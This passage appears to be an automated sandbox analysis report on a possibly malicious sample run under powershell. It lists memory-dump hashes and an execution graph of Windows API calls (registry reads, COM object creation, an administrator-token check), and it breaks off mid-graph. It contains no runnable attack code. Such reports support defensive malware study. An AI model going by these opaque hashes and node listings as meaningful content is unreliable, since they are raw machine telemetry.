                                                                                                                • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                • Instruction ID: e283136bbf5dde14c85fbe4d52dcd61d89dbe36b7cbd793c25c74318b03df970
                                                                                                                • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (Xpq$LRkq
                                                                                                                • API String ID: 0-1581626736
                                                                                                                • Opcode ID: c71eeb6227e30f86480200dc7b38a434ba3888615e20984186953eefc3959801
                                                                                                                • Instruction ID: b32f6a94bc987ff2992cc2a2eaed07e8bf2f0088b1bffa6009399103492eaa3a
                                                                                                                • Opcode Fuzzy Hash: c71eeb6227e30f86480200dc7b38a434ba3888615e20984186953eefc3959801
                                                                                                                • Instruction Fuzzy Hash: F2526E34B00218CFDB14EB64C894B6DBBB6BF85304F218499E449AB3A5DB35ED86CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (Xpq$LRkq
                                                                                                                • API String ID: 0-1581626736
                                                                                                                • Opcode ID: 4eb2cdabc63b35ac6ee4311be7e117f59b9edc8008bdc53ed480826d99ac68f3
                                                                                                                • Instruction ID: 07518f3650af4315c603089fafa0e156df924f62656497c9ae7c0c59d18306c5
                                                                                                                • Opcode Fuzzy Hash: 4eb2cdabc63b35ac6ee4311be7e117f59b9edc8008bdc53ed480826d99ac68f3
                                                                                                                • Instruction Fuzzy Hash: 37518C34B002188FDB24DFA8D844B9DBBB6FF84700F2185A9E545AB3A5DB71AD41CF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f4d88f06567e691e0d325137092aef4bd7ded0fe9ea58a77d4858eafde848d38
                                                                                                                • Instruction ID: 6247cce1f3fd615354b5d2e7c01444e9979267858e9fe11a14e022195664a112
                                                                                                                • Opcode Fuzzy Hash: f4d88f06567e691e0d325137092aef4bd7ded0fe9ea58a77d4858eafde848d38
                                                                                                                • Instruction Fuzzy Hash: A0919BB0A006098FCB15DF59C5949BEFBB1FF88310B2486A9D855AB3A5C735EC51CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 442939a84670ade4b15699ac27a25ff3ff50808fa8b44a4f8f73bf718864ac28
                                                                                                                • Instruction ID: 4de438c422b0d7a7e5d441ecce7b9b51143fb4dcd2e17b128770b57e51fcc78d
                                                                                                                • Opcode Fuzzy Hash: 442939a84670ade4b15699ac27a25ff3ff50808fa8b44a4f8f73bf718864ac28
                                                                                                                • Instruction Fuzzy Hash: 0B4125B4A006059FCB05CF58C598ABEFBB1FF48310B2181A9D855AB364C736EC51CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1772749465.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5cd000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a9ee11c7e59da3fd0905ae27b8d7723d67d3292c6056f6e7c39156362a176d5f
                                                                                                                • Instruction ID: 5fb5d255be72b4ceef17c9a49b15dcce9c02986e951ec80ccd1bbb2d977635df
                                                                                                                • Opcode Fuzzy Hash: a9ee11c7e59da3fd0905ae27b8d7723d67d3292c6056f6e7c39156362a176d5f
                                                                                                                • Instruction Fuzzy Hash: D301F7710093009EE7108A6ECD88F67BFA8FF41324F18C93DEC089B246D279D842C6B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1772749465.00000000005CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5cd000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5275c5ed96b3e3d417b2d7a0bbaeed65411c5a20e27a6a2d6156650e4bb53e08
                                                                                                                • Instruction ID: 293c818294a249927f2fc4bb08a411cdcacbf4613da0df470db388afdd768902
                                                                                                                • Opcode Fuzzy Hash: 5275c5ed96b3e3d417b2d7a0bbaeed65411c5a20e27a6a2d6156650e4bb53e08
                                                                                                                • Instruction Fuzzy Hash: F601526100E3C05ED7124B258C98B62BFB4EF53224F1DC5DBD888DF1A7D2699849C772
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 513b4081edc8a50c3fd7196270721c92623c47e975412653a5b9a8ee81ee2c60
                                                                                                                • Instruction ID: 298c59bd18d2823801e82197f2059dbb04a762b8be6671faadb36582c900610d
                                                                                                                • Opcode Fuzzy Hash: 513b4081edc8a50c3fd7196270721c92623c47e975412653a5b9a8ee81ee2c60
                                                                                                                • Instruction Fuzzy Hash: 25F06D70D0834A9FCB44EFB895021AEBFF09B09300B2448ABD948D7351E73849418BE1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d68b1e47f2eed2bfa0d35dec554f8ab132744a1924f796fd83434e8d0a8d6a13
                                                                                                                • Instruction ID: f6d4c4e1bb60aab810d276039bd565b1dc825d80868d6a9cf82589374fdc1bc9
                                                                                                                • Opcode Fuzzy Hash: d68b1e47f2eed2bfa0d35dec554f8ab132744a1924f796fd83434e8d0a8d6a13
                                                                                                                • Instruction Fuzzy Hash: B8E0B6B4D0420E9FCF88EFB994421BEFBF4AB08300F10896E9819E3300E63856018FE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 65bd1beefa3f5ca4f204eb6828f77e9a000494b4f38c08f25a4764067f8c061a
                                                                                                                • Instruction ID: 9c61de3caee0e5b616f6bd6869e2df899b9834bb4ede32ce7bc76df2dbc399ec
                                                                                                                • Opcode Fuzzy Hash: 65bd1beefa3f5ca4f204eb6828f77e9a000494b4f38c08f25a4764067f8c061a
                                                                                                                • Instruction Fuzzy Hash: A9D0C92501D3D94ED31727A1A0193F1FF645B02311F3884C7EB8889793976E9996D7B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.1773333868.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_980000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f19de0235a9f3b9ef0ad51959a8960b48382fb8a1fa888f15bfbd4e39c3e0027
                                                                                                                • Instruction ID: c22d16a43ae9e542f6286a30bfad3a2a7db5ad4f7ce117d564541451a31bbd05
                                                                                                                • Opcode Fuzzy Hash: f19de0235a9f3b9ef0ad51959a8960b48382fb8a1fa888f15bfbd4e39c3e0027
                                                                                                                • Instruction Fuzzy Hash: 33C04C3004C75C86D31567F6A00D7B4FE9C6741305F680441A30D406529A5EB46087B5

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.8%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:10.7%
                                                                                                                Total number of Nodes:1267
                                                                                                                Total number of Limit Nodes:25
                                                                                                                execution_graph 6570 b5da30 8 API calls 6575 b5c8a6 ScreenToClient ScreenToClient #3133 6570->6575 6574 b5db96 6576 b5c8d8 7 API calls 6575->6576 6577 b6f3a0 6576->6577 6578 b6f3ab 6577->6578 6579 b6f3a8 6577->6579 6582 b6f4cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6578->6582 6579->6574 6581 b6f602 6581->6574 6582->6581 6583 b5eab0 6584 b5eabc __EH_prolog3 6583->6584 6589 b6de06 6584->6589 6587 b5ead7 6590 b6de1b malloc 6589->6590 6591 b6de0e _callnewh 6590->6591 6592 b5eac3 6590->6592 6591->6590 6591->6592 6592->6587 6593 b5eae6 6592->6593 6597 b6f3e2 6593->6597 6595 b5eaf2 14 API calls 6596 b5ebcb 6595->6596 6596->6587 6597->6595 6598 b5b4f0 6599 b5b4fc __EH_prolog3 6598->6599 6642 b5b463 GetModuleHandleW 6599->6642 6604 b5b552 #6112 6654 b5b421 #1172 6604->6654 6605 b5b528 #538 6709 b6d91d 6605->6709 6609 b5b543 #800 6611 b5b690 6609->6611 6613 b5b576 6615 b6de06 2 API calls 6613->6615 6614 b5b56f #2613 6614->6613 6616 b5b57d 6615->6616 6617 b5b597 6616->6617 6618 b5b58e #384 6616->6618 6619 b5b599 #2089 6617->6619 6618->6619 6620 b5b5c7 6619->6620 6621 b5b5bb #1197 6619->6621 6622 b6de06 2 API calls 6620->6622 6621->6620 6623 b5b5ce 6622->6623 6624 b5b5f5 6623->6624 6625 b5b5dc #520 6623->6625 6626 b5b5f7 #986 #4604 6624->6626 6625->6626 6627 b5b421 #1172 6626->6627 6628 b5b616 6627->6628 6677 b5bb96 6628->6677 6635 b5b639 #1197 6636 b5b647 6635->6636 6738 b61870 6636->6738 6643 b5b497 GetVersionExW 6642->6643 6644 b5b472 GetProcAddress 6642->6644 6646 b6bd2a 6643->6646 6645 b5b485 6644->6645 6645->6643 6647 b6d4cd 5 API calls 6646->6647 6648 b6bd2f 6647->6648 6649 b6bd33 LoadLibraryW 6648->6649 6650 b5b51d #1202 6648->6650 6651 b6bd42 MessageBoxW exit 6649->6651 6652 b6bd5e GetProcAddress 6649->6652 6650->6604 6650->6605 6651->6652 6652->6650 6652->6651 6655 b5b42f 6654->6655 6656 b5b905 6655->6656 6804 b6f415 6656->6804 6658 b5b914 #540 #4155 StringFromGUID2 wsprintfW RegQueryValueW 6659 b5b992 #540 #540 #538 6658->6659 6660 b5b98c 6658->6660 6662 b5baa8 LoadLibraryW 6659->6662 6661 b5bb81 #800 6660->6661 6805 b6f3c4 6661->6805 6664 b5babf GetProcAddress 6662->6664 6665 b5b9c9 6 API calls 6662->6665 6674 b5bad1 6664->6674 6666 b5bb60 #800 #800 #800 6665->6666 6667 b5ba2b #355 #2507 6665->6667 6666->6661 6670 b5ba61 #3494 #858 #800 #800 #641 6667->6670 6671 b5bae3 #800 #641 6667->6671 6668 b5b566 6668->6613 6668->6614 6669 b5bb06 #4155 #4155 #940 #1197 6673 b5bb3d FreeLibrary 6669->6673 6670->6662 6672 b5bb44 6671->6672 6672->6666 6675 b5bb49 #6398 6672->6675 6673->6672 6674->6669 6676 b5baff 6674->6676 6675->6666 6676->6673 6808 b6f415 6677->6808 6679 b5bba5 #540 #4155 6680 b5bc50 6 API calls 6679->6680 6681 b5bbd3 StringFromGUID2 wsprintfW RegQueryValueW 6679->6681 6683 b5bdae LoadLibraryW 6680->6683 6681->6680 6682 b5bc31 #3516 6681->6682 6682->6680 6684 b5bf5c #800 6682->6684 6685 b5bdc5 GetProcAddress 6683->6685 6686 b5bcca 6 API calls 6683->6686 6687 b6f3c4 4 API calls 6684->6687 6701 b5bdd7 6685->6701 6688 b5be51 RegOpenKeyExW 6686->6688 6689 b5bd2d #355 #2507 6686->6689 6691 b5b61c 6687->6691 6692 b5be77 StringFromGUID2 6688->6692 6693 b5bf1e 6688->6693 6694 b5bd67 #3494 #858 #800 #800 #641 6689->6694 6695 b5bde9 #800 #641 6689->6695 6690 b5be0b #4155 #4155 #940 #1197 6698 b5be4a FreeLibrary 6690->6698 6720 b6d4cd GetVersionExW 6691->6720 6809 b6d81b lstrlenW 6692->6809 6696 b5bf22 #6398 6693->6696 6697 b5bf39 #800 #800 #800 6693->6697 6694->6683 6695->6688 6696->6697 6697->6684 6698->6688 6701->6690 6704 b5be05 6701->6704 6702 b6d81b 12 API calls 6703 b5bec6 StringFromGUID2 6702->6703 6705 b6d81b 12 API calls 6703->6705 6704->6698 6706 b5beec StringFromGUID2 6705->6706 6707 b6d81b 12 API calls 6706->6707 6708 b5bf12 RegCloseKey 6707->6708 6708->6693 6818 b6f3e2 6709->6818 6711 b6d929 FormatMessageW 6712 b6d9b4 #540 6711->6712 6713 b6d94c #540 6711->6713 6715 b6dceb 2 API calls 6712->6715 6819 b6dceb 6713->6819 6717 b6d9cb #2810 #922 #858 #800 #1197 6715->6717 6718 b6da13 #800 6717->6718 6719 b6da1d 6718->6719 6719->6609 6721 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6720->6721 6722 b5b627 6721->6722 6722->6636 6723 b6da20 GetCurrentProcess OpenProcessToken 6722->6723 6724 b6da62 malloc 6723->6724 6737 b6dad5 6723->6737 6727 b6da76 GetTokenInformation 6724->6727 6724->6737 6725 b6dae1 FreeSid 6726 b6daea 6725->6726 6729 b6daf6 6726->6729 6730 b6daee free 6726->6730 6728 b6da8b AllocateAndInitializeSid 6727->6728 6727->6737 6733 b6daac 6728->6733 6728->6737 6731 b6db05 6729->6731 6732 b6dafc CloseHandle 6729->6732 6730->6729 6734 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6731->6734 6732->6731 6736 b6dab8 EqualSid 6733->6736 6733->6737 6735 b5b630 6734->6735 6735->6635 6735->6636 6736->6733 6736->6737 6737->6725 6737->6726 6826 b6f44b 6738->6826 6740 b6187c 8 API calls 6741 b61b1e #1258 6740->6741 6742 b61908 #2910 6740->6742 6743 b61b24 __EH_prolog3_GS 6741->6743 6827 b6db5f 6742->6827 6746 b61b30 16 API calls 6743->6746 6748 b6f3c4 4 API calls 6746->6748 6747 b6db5f 7 API calls 6749 b61941 6747->6749 6750 b5b66a 6748->6750 6749->6741 6751 b6db5f 7 API calls 6749->6751 6776 b5b734 6750->6776 6752 b6195a 6751->6752 6752->6741 6753 b6db5f 7 API calls 6752->6753 6754 b61973 6753->6754 6754->6741 6755 b6db5f 7 API calls 6754->6755 6756 b6198c 6755->6756 6756->6741 6757 b6db5f 7 API calls 6756->6757 6758 b619a5 6757->6758 6758->6741 6759 b6db5f 7 API calls 6758->6759 6760 b619be 6759->6760 6760->6741 6761 b6db5f 7 API calls 6760->6761 6762 b619d7 6761->6762 6762->6741 6763 b6db5f 7 API calls 6762->6763 6764 b619f0 6763->6764 6764->6741 6765 b6db5f 7 API calls 6764->6765 6766 b61a09 6765->6766 6766->6741 6767 b6db5f 7 API calls 6766->6767 6768 b61a22 6767->6768 6768->6741 6769 b6db5f 7 API calls 6768->6769 6770 b61a3c 6769->6770 6770->6741 6771 b61a49 7 API calls 6770->6771 6773 b61b16 6771->6773 6842 b6f3d3 6773->6842 6777 b5b740 __EH_prolog3_GS 6776->6777 6778 b5b76e #538 6777->6778 6793 b5b8b0 6777->6793 6845 b64899 #1662 #540 6778->6845 6780 b6f3c4 4 API calls 6782 b5b671 #5977 6780->6782 6782->6611 6783 b5b7a5 #538 6785 b5b7b5 6783->6785 6784 b5b7e4 6786 b5b7ec CLSIDFromProgID 6784->6786 6784->6793 6866 b642eb #1662 6785->6866 6788 b5b879 6786->6788 6789 b5b7fb CoCreateInstance 6786->6789 6790 b5b896 6788->6790 6791 b5b882 LoadTypeLib 6788->6791 6799 b5b847 #540 #2810 6789->6799 6800 b5b830 #538 6789->6800 6794 b5b89f 6790->6794 6795 b5b8c8 #540 #2810 6790->6795 6791->6790 6793->6780 6897 b61c95 6794->6897 6798 b6d91d 17 API calls 6795->6798 6803 b5b874 #800 6798->6803 6801 b6d91d 17 API calls 6799->6801 6800->6785 6801->6803 6803->6793 6804->6658 6806 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6805->6806 6807 b6f3ce 6806->6807 6807->6807 6808->6679 6810 b6d853 6809->6810 6811 b6d85d RegCreateKeyExW 6809->6811 6815 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6810->6815 6811->6810 6812 b6d891 lstrcpyW lstrlenW 6811->6812 6813 b6d8b1 lstrlenW 6812->6813 6814 b6d8ca lstrlenW 6812->6814 6816 b6d8e1 RegSetValueExW RegCloseKey 6813->6816 6814->6816 6817 b5bea0 StringFromGUID2 6815->6817 6816->6810 6817->6702 6818->6711 6823 b6dcfa 6819->6823 6820 b6dcff wsprintfW 6822 b6d95f 6 API calls 6820->6822 6822->6718 6823->6820 6824 b6dd28 6823->6824 6825 b6dd2e wsprintfW 6824->6825 6825->6822 6826->6740 6828 b6db78 isspace 6827->6828 6829 b6db75 6828->6829 6830 b6db87 6828->6830 6829->6828 6831 b6dc03 isdigit 6830->6831 6839 b6dbc1 isxdigit 6830->6839 6841 b61925 6830->6841 6833 b6dc01 isspace 6831->6833 6837 b6dc39 6833->6837 6835 b6dbc6 isdigit 6838 b6dbe2 toupper 6835->6838 6835->6839 6840 b6dc42 isspace 6837->6840 6837->6841 6838->6839 6839->6833 6839->6835 6840->6840 6840->6841 6841->6741 6841->6747 6843 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6842->6843 6844 b6f3dd 6843->6844 6844->6844 6925 b5b3f4 6845->6925 6847 b6490a lstrcpyW CreateBindCtx 6848 b64948 6847->6848 6849 b64957 MkParseDisplayName 6848->6849 6850 b6497f 6848->6850 6849->6850 6851 b64a29 lstrlenW 6850->6851 6854 b649a2 #2644 #2810 6850->6854 6852 b64a3e 6851->6852 6861 b64a9c #2644 #800 6851->6861 6853 b64a58 6852->6853 6926 b6f604 6852->6926 6855 b64a5f #2810 6853->6855 6859 b6d91d 17 API calls 6854->6859 6857 b6d91d 17 API calls 6855->6857 6857->6861 6860 b64a03 #800 6859->6860 6862 b64b68 6860->6862 6861->6862 6863 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6862->6863 6864 b5b790 #800 6863->6864 6864->6783 6864->6784 6868 b64369 6866->6868 6930 b5b3d0 6868->6930 6870 b64496 #858 6873 b64553 #540 6870->6873 6875 b6457c 6873->6875 6876 b64587 StringFromGUID2 6875->6876 6877 b64640 #2810 6875->6877 6936 b5b696 6876->6936 6879 b64659 6877->6879 6982 b64794 6879->6982 6880 b645ac lstrcpyW 6937 b67a11 6880->6937 6886 b64612 RegQueryValueW #2810 6886->6879 6887 b64731 #2644 6888 b64745 #800 6887->6888 6891 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6888->6891 6893 b5b7ca #800 6891->6893 6893->6793 6894 b6d91d 17 API calls 6895 b64722 #800 6894->6895 6895->6887 6896 b64689 #540 #2810 6896->6894 7008 b6f415 6897->7008 6899 b61ca4 StringFromGUID2 wsprintfW RegQueryValueW 6900 b61d36 6899->6900 6901 b61d24 lstrcpyW 6899->6901 6908 b61e58 6900->6908 7009 b61c2f 6900->7009 6901->6900 6904 b61ed8 CoCreateInstance 6907 b61e8a #540 6904->6907 6922 b61efa 6904->6922 6905 b61df8 CLSIDFromString 6905->6908 6912 b61e12 #540 #2810 6905->6912 6906 b61da8 6911 b61c2f _vsnwprintf 6906->6911 6909 b61ea3 6907->6909 6910 b61eaf #2859 6907->6910 6908->6904 6909->6910 6913 b61f7e #2810 6909->6913 6914 b5bb96 57 API calls 6910->6914 6915 b61dc2 RegQueryValueW 6911->6915 6916 b6d91d 17 API calls 6912->6916 6919 b6d91d 17 API calls 6913->6919 6917 b61ec1 6914->6917 6915->6905 6915->6908 6918 b61e48 #800 6916->6918 6920 b61fa6 6917->6920 6921 b61ec9 #800 6917->6921 6918->6922 6919->6920 6921->6904 6923 b6f3c4 4 API calls 6922->6923 6924 b61f7b 6923->6924 6924->6793 6925->6847 6929 b6f4cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6926->6929 6928 b6f6bc 6928->6855 6929->6928 6931 b6de06 2 API calls 6930->6931 6932 b5b3dd 6931->6932 6932->6870 6933 b63e89 6932->6933 6997 b63e80 6933->6997 6935 b63ebb #540 #540 6935->6870 6936->6880 6938 b67a47 CLSIDFromString 6937->6938 6939 b67a40 6937->6939 6938->6939 6940 b67a70 wsprintfW RegOpenKeyW 6938->6940 6941 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 6939->6941 6940->6939 6942 b67ab6 6940->6942 6943 b645c6 #2810 lstrcpyW 6941->6943 6998 b679b1 RegOpenKeyW 6942->6998 6981 b5b3f4 6943->6981 6947 b67b1d _wcsnicmp 6949 b67ba6 6947->6949 6950 b67b38 lstrcmpiW 6947->6950 6948 b67bb8 RegQueryValueW 6951 b67c42 RegOpenKeyW 6948->6951 6952 b67bdb _wcsnicmp 6948->6952 6949->6951 6950->6949 6953 b67b4e lstrcmpiW 6950->6953 6955 b67c5e RegCloseKey 6951->6955 6956 b67c99 RegOpenKeyW 6951->6956 6952->6951 6954 b67bf6 lstrcmpiW 6952->6954 6953->6949 6957 b67b64 lstrcmpiW 6953->6957 6954->6949 6960 b67c0c lstrcmpiW 6954->6960 6966 b67e65 RegQueryValueW 6955->6966 6958 b67cb5 RegCloseKey 6956->6958 6959 b67cf0 RegOpenKeyW 6956->6959 6957->6949 6962 b67b7a lstrcmpiW 6957->6962 6958->6966 6963 b67d47 RegCloseKey RegQueryValueW 6959->6963 6964 b67d0c RegCloseKey 6959->6964 6960->6949 6965 b67c22 lstrcmpiW 6960->6965 6962->6949 6967 b67b90 lstrcmpiW 6962->6967 6963->6966 6969 b67d87 wsprintfW RegOpenKeyW 6963->6969 6964->6966 6965->6949 6965->6951 6970 b67ec7 #861 6966->6970 6971 b67ea4 RegQueryValueW 6966->6971 6967->6949 6973 b67dc3 RegCloseKey 6969->6973 6974 b67df8 wsprintfW RegOpenKeyW 6969->6974 6976 b67edf 6970->6976 6971->6970 6971->6976 6973->6966 6974->6966 6975 b67e34 RegCloseKey 6974->6975 6975->6966 6978 b67ef4 6976->6978 6979 b67ee8 RegCloseKey 6976->6979 6978->6939 6979->6978 6981->6886 6983 b647f4 6982->6983 6984 b647ba 6982->6984 7004 b67f0b SendMessageW 6983->7004 7003 b67f0b SendMessageW 6984->7003 6987 b64852 7005 b655e4 SendMessageW 6987->7005 6989 b64869 7006 b655e4 SendMessageW 6989->7006 6991 b64880 7007 b691e9 SendMessageW 6991->7007 6993 b64676 6993->6887 6994 b69137 6993->6994 6995 b6914b CoFreeUnusedLibraries 6994->6995 6995->6896 6997->6935 6999 b679d1 RegOpenKeyW 6998->6999 7000 b679fd RegCloseKey 6998->7000 6999->7000 7001 b679e7 RegOpenKeyW 6999->7001 7002 b67a0b RegQueryValueW 7000->7002 7001->7000 7001->7002 7002->6947 7002->6948 7003->6983 7004->6987 7005->6989 7006->6991 7007->6993 7008->6899 7010 b61c3e 7009->7010 7011 b61c4e _vsnwprintf 7010->7011 7012 b61c6d RegQueryValueW 7010->7012 7011->7012 7012->6905 7012->6906 7013 b62eb0 7018 b6db15 7013->7018 7017 b62ece 7019 b6db1e LoadLibraryW 7018->7019 7020 b62ebf 7018->7020 7021 b6db37 GetProcAddress 7019->7021 7022 b6db58 7019->7022 7020->7017 7025 b62940 7020->7025 7023 b6db47 7021->7023 7024 b6db51 FreeLibrary 7021->7024 7022->7020 7023->7024 7024->7022 7026 b62958 7025->7026 7035 b678ed GetFocus #2859 7026->7035 7028 b62966 7029 b629d5 7028->7029 7030 b62971 7028->7030 7029->7017 7036 b67980 SendMessageW 7030->7036 7032 b62980 7032->7029 7037 b678fa SendMessageW 7032->7037 7034 b629a3 7034->7029 7035->7028 7036->7032 7037->7034 7038 b60d90 #5491 #4451 7039 b60e60 7038->7039 7040 b60dbb #2112 7038->7040 7040->7039 7041 b60ddb #4158 7040->7041 7041->7039 7042 b60de8 #5867 #2109 7041->7042 7042->7039 7043 b60e15 #5996 7042->7043 7043->7039 7044 b60e27 #3477 #6063 #2550 7043->7044 7044->7039 7045 b67ff0 7046 b68036 7045->7046 7094 b69205 7046->7094 7048 b6803d #1662 7049 b6808e 7048->7049 7097 b5e18b SendMessageW 7049->7097 7051 b68095 CoCreateInstance 7052 b680ba 7051->7052 7056 b68137 7052->7056 7106 b6642d CoCreateInstance 7052->7106 7054 b68422 7143 b5e18b SendMessageW 7054->7143 7055 b68403 7141 b678da SendMessageW 7055->7141 7093 b683f4 7056->7093 7098 b67f0b SendMessageW 7056->7098 7060 b6816c 7063 b5b3d0 2 API calls 7060->7063 7061 b68412 7142 b691e9 SendMessageW 7061->7142 7062 b68433 #2644 7064 b6819a 7063->7064 7066 b63e89 2 API calls 7064->7066 7067 b681af 7064->7067 7066->7067 7099 b67f0b SendMessageW 7067->7099 7069 b681eb 7100 b655e4 SendMessageW 7069->7100 7071 b682a6 7101 b67f0b SendMessageW 7071->7101 7072 b6820c 7072->7071 7136 b67f0b SendMessageW 7072->7136 7075 b682d4 7102 b67f0b SendMessageW 7075->7102 7076 b6824a 7137 b67f0b SendMessageW 7076->7137 7079 b68278 7138 b67f0b SendMessageW 7079->7138 7080 b68359 7083 b6db15 3 API calls 7080->7083 7081 b682fc 7085 b68333 7081->7085 7139 b67f0b SendMessageW 7081->7139 7088 b6835e 7083->7088 7085->7080 7103 b655e4 SendMessageW 7085->7103 7087 b68391 7104 b67f0b SendMessageW 7087->7104 7088->7087 7140 b67f0b SendMessageW 7088->7140 7091 b683c6 7105 b67f0b SendMessageW 7091->7105 7093->7054 7093->7055 7095 b69214 SendMessageW #2857 7094->7095 7096 b69211 7094->7096 7095->7048 7096->7095 7097->7051 7098->7060 7099->7069 7100->7072 7101->7075 7102->7081 7103->7080 7104->7091 7105->7093 7107 b664dc GetUserDefaultLCID 7106->7107 7108 b66738 RegOpenKeyW 7106->7108 7134 b66514 7107->7134 7109 b6675e RegEnumKeyW 7108->7109 7125 b666e1 7108->7125 7113 b66917 RegCloseKey 7109->7113 7114 b66797 RegOpenKeyW 7109->7114 7110 b6f3a0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 7112 b66938 7110->7112 7112->7056 7113->7125 7115 b66912 7114->7115 7116 b667b9 RegQueryValueExW 7114->7116 7115->7056 7117 b66906 RegCloseKey 7116->7117 7118 b667ee 7116->7118 7117->7115 7119 b66800 wsprintfW 7118->7119 7120 b6681c 7118->7120 7119->7120 7121 b5b3d0 2 API calls 7120->7121 7122 b66826 7121->7122 7123 b63e89 2 API calls 7122->7123 7124 b66847 7122->7124 7123->7124 7127 b67a11 41 API calls 7124->7127 7125->7110 7126 b66579 StringFromGUID2 7128 b665b5 wsprintfW 7126->7128 7126->7134 7129 b66891 7127->7129 7128->7134 7145 b67f0b SendMessageW 7129->7145 7130 b5b3d0 2 API calls 7130->7134 7132 b63e89 2 API calls 7132->7134 7133 b67a11 41 API calls 7133->7134 7134->7125 7134->7126 7134->7130 7134->7132 7134->7133 7144 b67f0b SendMessageW 7134->7144 7136->7076 7137->7079 7138->7071 7139->7085 7140->7087 7141->7061 7142->7054 7143->7062 7144->7134 7145->7117 7146 b6edf0 __wgetmainargs 7147 b62870 7148 b62888 7147->7148 7157 b678ed GetFocus #2859 7148->7157 7150 b62896 7151 b628a1 7150->7151 7153 